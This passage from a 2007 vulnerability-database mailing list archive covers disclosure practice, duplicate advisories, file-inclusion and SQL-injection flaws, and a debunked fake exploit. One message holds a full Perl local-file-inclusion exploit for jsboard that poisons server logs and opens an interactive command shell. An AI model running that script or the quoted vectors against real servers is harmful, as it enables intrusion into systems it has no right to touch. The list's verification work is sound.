available at http://www.web-app.org/cgi-bin/index.cgi?action=downloads&cat=curstable , to deal with all of the above mentioned issues. Regards, WebAPP www.web-app.org ***** ----- Original Message ----- From: "George A. Theall" To: "Vulnerability Information Managers" Sent: Wednesday, March 21, 2007 5:55 PM Subject: Re: [VIM] WebAPP Audit > On 03/21/07 13:03, WebAPP wrote: > > > Guys, It's not very helpful to read about how people have found exploits > > and not be told what they are. > > Are you referring to my posting yesterday? If so, perhaps it would help > if I rephrased... In looking at the code changes between 0.9.9.5 and > 0.9.9.6, I found two vulnerabilities that had been patched and that > allowed for arbitrary code execution by an authenticated user. These are > issues that have already been identified and fixed in 0.9.9.6. > Understand that this was a review of the *changes* made, not a code > audit itself. > > You asked in an earlier message what we would like to see with regards > to security information from your project. I'm a bit surprised not to > have seen at least Jericho rise to the challenge, but personally I'd > like to see more information. Telling people that there's a serious set > of flaws in a software package and that they need to upgrade asap might > seem helpful at first blush, but in today's environment, people need a > way to prioritize. Give them basic information about the flaws so they > can understand the risks involved in not reacting right away. Are we > dealing with a cross-site scripting flaw that can be triggered when an > admin views application logs? A remote file include flaw that's > exploitable only if PHP's register_globals is enabled (yeah, I know > WebAPP uses Perl, not PHP, but I'm talking generally here)? A SQL > injection in a login page by which an attacker can gain admin access? A > design flaw by which the shopping cart's sales database is in a > web-accessible location? A feature that lets users upload arbitrary > files and then run them as a non-root user? This sort of information > will go a long way to helping your users assess the risks they face. > > P.S. I wouldn't be surprised if telling people they really Really REALLY > need to upgrade motivates malicious people to discover what's been > patched more than it convinces others to upgrade their own systems. > > > George > -- > theall at tenablesecurity.com > From theall at tenablesecurity.com Thu Mar 22 23:59:25 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 22 Mar 2007 19:59:25 -0400 Subject: [VIM] WebAPP Audit In-Reply-To: <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net> References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net><000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> <4601E20F.8090606@tenablesecurity.com> <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net> Message-ID: <4603185D.9090808@tenablesecurity.com> On 03/22/07 01:40, WebAPP wrote: > WebAPP (Web Automated Perl Portal) has recently had a security audit. > Several issues were uncovered, including the following: > > Form input validation flaws. > It was found possible to insert certain characters in order to obtain > unexpected results from form submissions. Data files could be corrupted by > percent encoded or otherwise escaped character insertion. Under certain > conditions, forms could be exploited to allow undesired access to private > files. With expert use, this could be exploited to execute code on the host > server. This sort of information is much more useful. The only thing I would add would be whether an attacker must be authenticated to exploit the more serious flaws. I'd hope you ultimately will post that on your site so your users can understand the risks. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Fri Mar 23 20:50:03 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 23 Mar 2007 16:50:03 -0400 Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit Message-ID: <46043D7B.3080103@tenablesecurity.com> After last summer's blitz, any remote file include issue published nowadays and involving mosConfig_absolute_path raises suspicions in my mind. So when I saw today's announcement of one affecting the User Home Pages (UHP) module, I looked a bit... Turns out it's the same as what kurdish security published last summer. Compare for yourself: Old: kurdishsecurity.blogspot.com/2006/07/kurdish-security-15-user-home-pges.html New: http://milw0rm.com/exploits/3553 Or am I just overlooking something? George -- theall at tenablesecurity.com From coley at linus.mitre.org Fri Mar 23 21:09:39 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 23 Mar 2007 17:09:39 -0400 (EDT) Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit In-Reply-To: <46043D7B.3080103@tenablesecurity.com> References: <46043D7B.3080103@tenablesecurity.com> Message-ID: On Fri, 23 Mar 2007, George A. Theall wrote: > After last summer's blitz, any remote file include issue published > nowadays and involving mosConfig_absolute_path raises suspicions in my > mind. Really? Hmmm. Since mosConfig_absolute_path is clearly associated with arbitrary third-party modules (like phpbb_home_path is for PHPBB), I'm not always going to be suspicious - since there's been enough evidence that many module developers don't actually add the required anti-direct-request check. i.e.: 1) third-party modules for Mambo/Joomla apparently require that mosConfig_absolute_path is set 2) Proper integration of the module into the environment apparently suggests protection against direct request using defined('_VALID_MOS') 3) Predictably, lots of module developers don't do step 2. We've got over 30 CVE's for different modules. 4) Therefore mosConfig_absolute_path is a valid RFI vector for those modules (with the usual disclaimers), and is also all over the place because of the raw number of modules for mambo/joomla. 5) Similar rationale holds for PHPBB modules. 6) crackers_child and others aside, this seems like a legitimate issue. The source code for uhp_config.php says: define ("_uhp_TITLE","User Home Pages"); ... global $mosConfig_absolute_path; require($mosConfig_absolute_path."/administrator/components/com_uhp/uhp_config.inc"); which sure looks like legit RFI to me. And, as you said, sure looks the same as last year's. But this kind of rediscovery is not surprising. - Steve From theall at tenablesecurity.com Fri Mar 23 21:14:52 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 23 Mar 2007 17:14:52 -0400 Subject: [VIM] Helix Server LoadTestPassword Overflow Message-ID: <4604434C.5090800@tenablesecurity.com> Has anyone had a chance to look at the buffer overflow in Helix Server covered by Evgeny Legerov (http://gleg.net/helix.txt)? SecurityFocus assigned it a new BID (23068) but it looks suspciously like the same flaw covered by BID 21141 / CVE-2006-6026 from last November. The earlier entries both are for the open-source Helix DNA Server while the newer one is for RealNetwork's Helix Server. While Legerov's advisory talks only of "Helix Server", it references a CVS commit message for the open-source variant, which in turn cross-references BID 21141. Oddly, though, the description SecurityFocus has for the earlier BID says "The vendor refutes this issue, stating that the report is unsubstantiated". Does this mean the vendor (whichever) simply didn't have details for an exploit? Legerov claims to have notified the vendor in December... Btw, I've tested Legerov's PoC against both Helix DNA Server 11.1 and Helix Server 11.1.2 on Windows; it crashes both so I suspect the answer to my question is "yes". George -- theall at tenablesecurity.com From coley at mitre.org Fri Mar 23 21:16:42 2007 From: coley at mitre.org (Steven M. Christey) Date: Fri, 23 Mar 2007 17:16:42 -0400 (EDT) Subject: [VIM] Root cause of NPDS SQL injection is variable extraction/evaluation Message-ID: <200703232116.l2NLGg7B026632@faron.mitre.org> Researcher: DarkFig Ref: Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day http://www.securityfocus.com/archive/1/archive/1/463176/100/0/threaded Granted the layout isn't optimal, but he excerpts the relevant source code for each step of the exploit - actually pretty cool. Anyway, here's my rough analysis: 1) line 31 of print.php uses $DB variable in a query. 2) grab_globals.php shows a whole bunch of juicy extract() goodness with EXTR_OVERWRITE, so we get to modify nearly-arbitrary variables including whatever superglobal the relevant PHP version isn't protecting. So, _FILES[DB][tmp_name] is overwritten in line 83. 3) Lines 133-134 in grab_globals.php do the dynamic variable evaluation; looping through the values of _FILES[], we wind up processing _FILES[DB], setting $$DB = _FILES[DB][tmp_name] . 4) I didn't investigate any further, but it wouldn't be surprising if there were other attacks using the extract capability. - Steve From theall at tenablesecurity.com Fri Mar 23 21:18:58 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 23 Mar 2007 17:18:58 -0400 Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit In-Reply-To: References: <46043D7B.3080103@tenablesecurity.com> Message-ID: <46044442.9020903@tenablesecurity.com> On 03/23/07 17:09, Steven M. Christey wrote: >> After last summer's blitz, any remote file include issue published >> nowadays and involving mosConfig_absolute_path raises suspicions in >> my mind. > > Really? Hmmm. Since mosConfig_absolute_path is clearly associated > with arbitrary third-party modules (like phpbb_home_path is for > PHPBB), I'm not always going to be suspicious I apologize - I was being sarcastic. It seemed like everybody and his brother was testing Mambo modules for this flaw last summer and hence unlikely that one was missed. > which sure looks like legit RFI to me. > > And, as you said, sure looks the same as last year's. But this kind of > rediscovery is not surprising. I'm not denying the flaw exists, only expressing surprise it slipped by SecurityFocus and especially str0ke. George -- theall at tenablesecurity.com From coley at linus.mitre.org Fri Mar 23 21:33:01 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 23 Mar 2007 17:33:01 -0400 (EDT) Subject: [VIM] Helix Server LoadTestPassword Overflow In-Reply-To: <4604434C.5090800@tenablesecurity.com> References: <4604434C.5090800@tenablesecurity.com> Message-ID: On Fri, 23 Mar 2007, George A. Theall wrote: > Has anyone had a chance to look at the buffer overflow in Helix Server > covered by Evgeny Legerov (http://gleg.net/helix.txt)? SecurityFocus > assigned it a new BID (23068) but it looks suspciously like the same > flaw covered by BID 21141 / CVE-2006-6026 from last November. I glanced at it too, it looks very similar. Only Leverov can confirm for sure, I'd bet. > Oddly, though, the description SecurityFocus has for the earlier BID > says "The vendor refutes this issue, stating that the report is > unsubstantiated". Does this mean the vendor (whichever) simply didn't > have details for an exploit? Legerov claims to have notified the vendor > in December... Interestingly, he also says it had been in the pack since February 2006. This was widely public around November 2006. Internal CVE notes also suggest that "Helix Server and Helix DNA Server are not the same. Helix Server is described on realnetworks.com and seems to require a purchase. Helix DNA Server is described on helixcommunity.org and seems to allow free source-code downloads after registration." - Steve From coley at linus.mitre.org Fri Mar 23 21:38:46 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 23 Mar 2007 17:38:46 -0400 (EDT) Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit In-Reply-To: <46044442.9020903@tenablesecurity.com> References: <46043D7B.3080103@tenablesecurity.com> <46044442.9020903@tenablesecurity.com> Message-ID: On Fri, 23 Mar 2007, George A. Theall wrote: > I'm not denying the flaw exists, only expressing surprise it slipped by > SecurityFocus and especially str0ke. Give str0ke a break, for he has yet to feel the pain of institutional amnesia that comes when you hit a few thousand vulnerabilities ;-) I know we sometimes introduce dupes in CVE because of rediscoveries of old issues that we forget to check (or that aren't indexed under alternate product/vendor spellings). - Steve From str0ke at milw0rm.com Fri Mar 23 21:54:53 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 23 Mar 2007 15:54:53 -0600 Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit In-Reply-To: References: <46043D7B.3080103@tenablesecurity.com> <46044442.9020903@tenablesecurity.com> Message-ID: <814b9d50703231454q11f3a87bo8803bb259153e239@mail.gmail.com> Appreciate the info guys. http://milw0rm.com/exploits/3553 << has been removed do to the duplicate here. http://www.milw0rm.com/exploits/2089 /str0ke On 3/23/07, Steven M. Christey wrote: > > On Fri, 23 Mar 2007, George A. Theall wrote: > > > I'm not denying the flaw exists, only expressing surprise it slipped by > > SecurityFocus and especially str0ke. > > Give str0ke a break, for he has yet to feel the pain of institutional > amnesia that comes when you hit a few thousand vulnerabilities ;-) I know > we sometimes introduce dupes in CVE because of rediscoveries of old issues > that we forget to check (or that aren't indexed under alternate > product/vendor spellings). > > - Steve > From theall at tenablesecurity.com Fri Mar 23 23:06:12 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 23 Mar 2007 19:06:12 -0400 Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit In-Reply-To: References: <46043D7B.3080103@tenablesecurity.com> <46044442.9020903@tenablesecurity.com> Message-ID: <46045D64.4050304@tenablesecurity.com> On 03/23/07 17:38, Steven M. Christey wrote: > Give str0ke a break, Oh, I'm not complaining -- I appreciate his work. And yours. And jericho's. I'm constantly referring to all three of your sites. You're all awesome! > for he has yet to feel the pain of institutional > amnesia that comes when you hit a few thousand vulnerabilities ;-) Don't you mean several tens of thousands? George -- theall at tenablesecurity.com From coley at linus.mitre.org Fri Mar 23 23:09:49 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 23 Mar 2007 19:09:49 -0400 (EDT) Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit In-Reply-To: <46045D64.4050304@tenablesecurity.com> References: <46043D7B.3080103@tenablesecurity.com> <46044442.9020903@tenablesecurity.com> <46045D64.4050304@tenablesecurity.com> Message-ID: On Fri, 23 Mar 2007, George A. Theall wrote: > > for he has yet to feel the pain of institutional > > amnesia that comes when you hit a few thousand vulnerabilities ;-) > > Don't you mean several tens of thousands? That is unspeakable pain, so it's self-explanatory why I didn't mention it :) - Steve From theall at tenablesecurity.com Fri Mar 23 23:19:22 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 23 Mar 2007 19:19:22 -0400 Subject: [VIM] Helix Server LoadTestPassword Overflow In-Reply-To: References: <4604434C.5090800@tenablesecurity.com> Message-ID: <4604607A.6070108@tenablesecurity.com> On 03/23/07 17:33, Steven M. Christey wrote: > I glanced at it too, it looks very similar. Only Leverov can confirm for > sure, I'd bet. Or the vendors. Perhaps. I'll shoot Legerov an email. > Internal CVE notes also suggest that "Helix Server and Helix DNA Server > are not the same. Helix Server is described on realnetworks.com and seems > to require a purchase. Helix DNA Server is described on helixcommunity.org > and seems to allow free source-code downloads after registration." Yeah, I realize that. But I don't understand the ambiguities in Legerov's advisory. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Sat Mar 24 11:55:51 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sat, 24 Mar 2007 07:55:51 -0400 Subject: [VIM] Helix Server LoadTestPassword Overflow In-Reply-To: <4604607A.6070108@tenablesecurity.com> References: <4604434C.5090800@tenablesecurity.com> <4604607A.6070108@tenablesecurity.com> Message-ID: <460511C7.6040800@tenablesecurity.com> On 03/23/07 19:19, George A. Theall wrote: > On 03/23/07 17:33, Steven M. Christey wrote: > >> I glanced at it too, it looks very similar. Only Leverov can confirm for >> sure, I'd bet. > > Or the vendors. Perhaps. I'll shoot Legerov an email. Evgeny confirmed in a private email that the issues (ie, BIDs 21141 and 23068) are the same. George -- theall at tenablesecurity.com From webapp at sitespot.us Sat Mar 24 19:36:55 2007 From: webapp at sitespot.us (WebAPP) Date: Sat, 24 Mar 2007 11:36:55 -0800 Subject: [VIM] WebAPP Audit References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net><000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net> <4601E20F.8090606@tenablesecurity.com><000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net> <4603185D.9090808@tenablesecurity.com> Message-ID: <000401c76e4b$c810df60$0500a8c0@hsd1.wa.comcast.net> George, I think that would be a good idea to post on the web-app.org site this unpublished description of some of the problems in the earlier WebAPP versions. Thank you very much, all, for your responses. Your help is much appreciated. Jos ----- Original Message ----- From: "George A. Theall" > This sort of information is much more useful. The only thing I would add > would be whether an attacker must be authenticated to exploit the more > serious flaws. I'd hope you ultimately will post that on your site so > your users can understand the risks. From coley at mitre.org Sat Mar 24 20:52:39 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 24 Mar 2007 16:52:39 -0400 (EDT) Subject: [VIM] Vendor ACK for FTPx DoS (CVE-2007-1082) Message-ID: <200703242052.l2OKqdEf005612@faron.mitre.org> On March 16, CVE received the following email from the vendor: > We believe this vulnerability to be addressed in our latest version, > FTP Explorer 1.0.1.52: > > http://www.ftpx.com/downloads/ftpx.exe > > Sincerely; > > Alan Chavis > FTPx Corp. - Steve From info at web-app.net Sat Mar 24 23:39:50 2007 From: info at web-app.net (info at web-app.net) Date: Sat, 24 Mar 2007 16:39:50 -0700 (PDT) Subject: [VIM] WebAPP Audit Message-ID: <1766.208.97.132.5.1174779590.squirrel@mail.web-app.net> Hi, I was searching in google on my name ?On Elpeleg? and was shocked to find this personal attack by Ms. Jos Brown from bantychick.com Claiming that I had left her site and started my own site. It is Ms. Jos Brown whom happened to be a former developer and a team member of the original WebAPP group at http://www.web-app.net and started her spin-off site after she bought the domain several months ago and not the other way. Please read this email that was just sent to Secunia concerning that. Ms. Jos has been posting several other posts around trying to trash me personally and the WebAPP team. Please disregard her posts. Thank you On Elpeleg ------------------------------- Incorrect/incomplete information concerning security issue Dear Sirs, In your article you are recommending your customers to update to WebAPP versions 0995 and/or 0996 from web-app.org, while it is only these two spin-off versions provided by the vendor at web-app.org which are really insecure. This information unfortunately creates a great confusion for the customers of the original script from http://www.web-app.net it would also be important to note that several WebAPP sites using these "patches" have recently been defaced. 1.) WebAPP original developers team (since 2002) has moved to http://www.web-app.net over a year ago and developed the current versions provided both by http://www.web-app.org (spin-off of that version) and http://www.web-app.net however, one developer decided to leave the team (or was rather expelled from the team) and bought the old domain name www.web-app.org 2-3 months ago. Since then she was trying very hard to convince everyone that her site still provides the original script and support by its original team which is not correct. A lookup at whois history of site changes will provide you proofs of owners change in web-app.org Please also see this article: http://www.web-app.net/cgi-bin/index.cgi?action=viewnews&id=6 (Jos Brown is the new owner of the spin-off site at www.web-app.org ). 2.) All versions released by web-app.org since the above mentioned developer left the team are insecure, while NONE of the other versions ever released by the original WebAPP team ( http://www.web-app.net ) have this critical back door that allows users to steal admin/root access to this server via this back door. Please see this test by Monty53 (a white hat hacker from Turkey): http://www.web-app.net/cgi-bin/index.cgi?action=forum&board=public_security&op=display&num=10395 You may contact him for more information at monty53 at gmail.com He says that he managed to deface all versions mentioned in your articles as "secure" while failing to do so in any of the original versions provided by http://www.web-app.net 3.) You define the issue as: "Moderately critical" while in fact it is a severe critical issue, this is because any user out there can access the admin control panel and thereby edit/delete/add paths, using the script as a server and acting as a root on that server. I am not sure you are aware of that, but this indicates of a severe critical security issue. Should you require more information kindly contact me at on at web-app.net or call me at 0047 90151475. Kind regards On Elpeleg WebAPP security team http://www.web-app.net Copy: WebAPP Security team members From theall at tenablesecurity.com Mon Mar 26 11:31:04 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 26 Mar 2007 07:31:04 -0400 Subject: [VIM] Confirm - Mambo 4.5.1 Modules Flatmenu <= 1.07 Remote File Include Exploit Message-ID: <4607AEF8.20907@tenablesecurity.com> Like I said before, I'm suspicious of these sort of flaws in Mambo / Joomla so I installed the software and took a look. Sure enough, the flaw does exist. In modules/mod_flatmenu.php of 1.0 (beta) Build 07 for Version 4.5.1, the first line of PHP code is: require_once( "$mosConfig_absolute_path/modules/mod_flatmenu.class.php" ); So, if register_globals is enabled, you have a vector for remote file include attacks. George -- theall at tenablesecurity.com From coley at mitre.org Tue Mar 27 18:16:23 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 27 Mar 2007 14:16:23 -0400 (EDT) Subject: [VIM] "File Upload" seems to be "Free File Hosting" Message-ID: <200703271816.l2RIGNep023335@faron.mitre.org> Refs: BUGTRAQ:20070324 File Upload System V1.0 (AD_BODY_TEMP) multiple file include http://www.securityfocus.com/archive/1/archive/1/463707/100/0/threaded This has the same parameter names as previously disclosed issues CVE-2006-5762, CVE-2006-5763, and CVE-2006-5764. Those CVE's are for "Free File Hosting 1.1" which is at http://www.free-php-scripts.net/P/Free_File_Hosting . This URL mentions a capability "File Upload System" and links to the demo page that's referenced in the latest Bugtraq post. So, the issues are the same. Oh - and source inspection confirms all the vectors listed in the CVE's: contact.php:22:
forgot_pass.php:3:
login.php:3:
register.php:3:
send.php:29:
- Steve From theall at tenablesecurity.com Thu Mar 29 10:56:24 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 29 Mar 2007 06:56:24 -0400 Subject: [VIM] iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability Message-ID: <460B9B58.30301@tenablesecurity.com> FYI, the recent advisory about a remote file include issue in iPhotoAlbum (BID 23189 / http://www.milw0rm.com/exploits/3596) seems to be already covered by BID 14229 / CVE-2005-2246. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Fri Mar 30 21:01:50 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 30 Mar 2007 16:01:50 -0500 Subject: [VIM] true: jsboard 2.0.10(login.php table)Local File Inclusion Exploit Message-ID: <814b9d50703301401j3f2b3869sf58e88a329d3c47d@mail.gmail.com> login.php =============== contains the function parse_query_str(); function parse_query_str() { if(ini_get("register_globals")) return; if(count($_GET)) { foreach($_GET as $key => $value) { global ${$key}; ${$key} = $value; } } if(count($_POST)) { foreach($_POST as $key => $value) { global ${$key}; ${$key} = $value; } } } ################################# So pretty much we just need magic quotes = off so we can NULL the string. /str0ke -------------------------------------------------------- #!/usr/bin/perl # jsboard 2.0.10(login.php table)Local File Inclusion Exploit # D.Script: http://kldp.net/frs/download.php/1729/jsboard-2.0.10.tar.gz # if($table && file_exists("data/$table/config.php")) # { include "data/$table/config.php"; } # Discovered & Coded by : GolD_M = [Mahmood_ali] # Contact:HackEr_ at w.Cn # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group use IO::Socket; use LWP::Simple; #ripped @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); if (@ARGV < 3) { print " =============================================================== # jsboard 2.0.10(login.php table)Local File Inclusion Exploit # # Gold.pl [Victim] / (apachepath) # # Ex: Gold.pl [Victim] / ../logs/error.log # =============================================================== # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # =============================================================== "; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "Code is injecting in logfiles...\n"; $CODE=""; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; print $socket "user-Agent: ".$CODE."\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "Write END to exit!\n"; print "If not working try another apache path\n\n"; print "[shell] ";$cmd = ; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; #now include parameter print $socket "GET ".$path."login.php?table=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = ; } From gmdarkfig at gmail.com Sat Mar 31 12:55:25 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 31 Mar 2007 14:55:25 +0200 Subject: [VIM] Fwd: SQL injection (x2) in NukeSentinel Message-ID: NukeSentinel 2.5.05: Code: if(!ereg("([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = "none"; } Results: File Disclosure (with a nice sql injection) + SQL Injection (includes/nsbypass.php) NukeSentinel 2.5.06 (they added ^ but they forgot to add $): Code: if(!ereg("^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = "none"; } Results: SQL Injection (includes/nukesentinel.php / includes/nsbypass.php) NukeSentinel 2.5.07 (includes/nukesentinel.php corrected): Code: if(!ereg("^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})$", $nsnst_const['remote_ip'])) { $nsnst_const['remote_ip'] = "none"; } There is always the SQL Injection in includes/nsbypass.php. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20070331/cfaa572a/attachment.html From gmdarkfig at gmail.com Sat Mar 31 13:06:15 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 31 Mar 2007 15:06:15 +0200 Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 Message-ID: readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 Author: ThE-WoLf-KsA Advisory: http://www.milw0rm.com/exploits/3573 The guy copied an article from SecurityReason: **error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2 http://securityreason.com/achievement_securityalert/41 He changed the title, the author's name, the function, and that's all. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20070331/7e6443f3/attachment.html From str0ke at milw0rm.com Sat Mar 31 13:11:57 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 31 Mar 2007 08:11:57 -0500 Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 In-Reply-To: References: Message-ID: <814b9d50703310611s637793c4sa1d6e70d27b06a2a@mail.gmail.com> Darkfig, This wasn't on their site when I posted it on milw0rm. Was it a leak'ing problem? /str0ke On 3/31/07, GM darkfig wrote: > readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 > Author: ThE-WoLf-KsA > Advisory: http://www.milw0rm.com/exploits/3573 > > The guy copied an article from SecurityReason: > error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2 > http://securityreason.com/achievement_securityalert/41 > > He changed the title, the author's name, the function, and that's all. From str0ke at milw0rm.com Sat Mar 31 13:13:01 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 31 Mar 2007 08:13:01 -0500 Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 In-Reply-To: <814b9d50703310611s637793c4sa1d6e70d27b06a2a@mail.gmail.com> References: <814b9d50703310611s637793c4sa1d6e70d27b06a2a@mail.gmail.com> Message-ID: <814b9d50703310613u44eeaf31nb716002d3819591@mail.gmail.com> No matter, different vulnerability im thinking of. Thanks for the heads up. /str0ke On 3/31/07, str0ke wrote: > Darkfig, > > This wasn't on their site when I posted it on milw0rm. Was it a > leak'ing problem? > > /str0ke > > On 3/31/07, GM darkfig wrote: > > readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 > > Author: ThE-WoLf-KsA > > Advisory: http://www.milw0rm.com/exploits/3573 > > > > The guy copied an article from SecurityReason: > > error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2 > > http://securityreason.com/achievement_securityalert/41 > > > > He changed the title, the author's name, the function, and that's all. > From gmdarkfig at gmail.com Sat Mar 31 13:32:23 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 31 Mar 2007 15:32:23 +0200 Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 Message-ID: The readfile() vulnerability doesn't exists. For example, the poc: ", 3,"php://../../".$file); ?> Quote from php.net: int readfile ( string $filename [, bool $use_include_path [, resource $context]] ) The first argument isn't a filename, the second is not a bool (true/false). The code quoted by the author is the code of the error_log function, not the readfile function. In his poc he just changed the function. Quote from SecurityReason: - --- 2. Exploit --- ", 3, "php://../../".$file); ?> Quote from the fake: - --- 2. Exploit --- ", 3, "php://../../".$file); ?> This will not work. From str0ke at milw0rm.com Sat Mar 31 13:36:44 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 31 Mar 2007 08:36:44 -0500 Subject: [VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 In-Reply-To: References: Message-ID: <814b9d50703310636p30315418s8bf8e64d0dead83a@mail.gmail.com> Got ya brotha. Removing the exploit #id. /str0ke On 3/31/07, GM darkfig wrote: > The readfile() vulnerability doesn't exists. For example, the poc: > ", 3,"php://../../".$file); ?> > > Quote from php.net: > int readfile ( string $filename [, bool $use_include_path [, resource > $context]] ) > > The first argument isn't a filename, the second is not a bool (true/false). > The code quoted by the author is the code of the error_log function, > not the readfile function. In his poc he just changed the function. > > Quote from SecurityReason: > - --- 2. Exploit --- > $file=""; # FILENAME > error_log("", 3, > "php://../../".$file); > ?> > > Quote from the fake: > - --- 2. Exploit --- > $file=""; # FILENAME > readfile("", 3, > "php://../../".$file); > ?> > > This will not work. >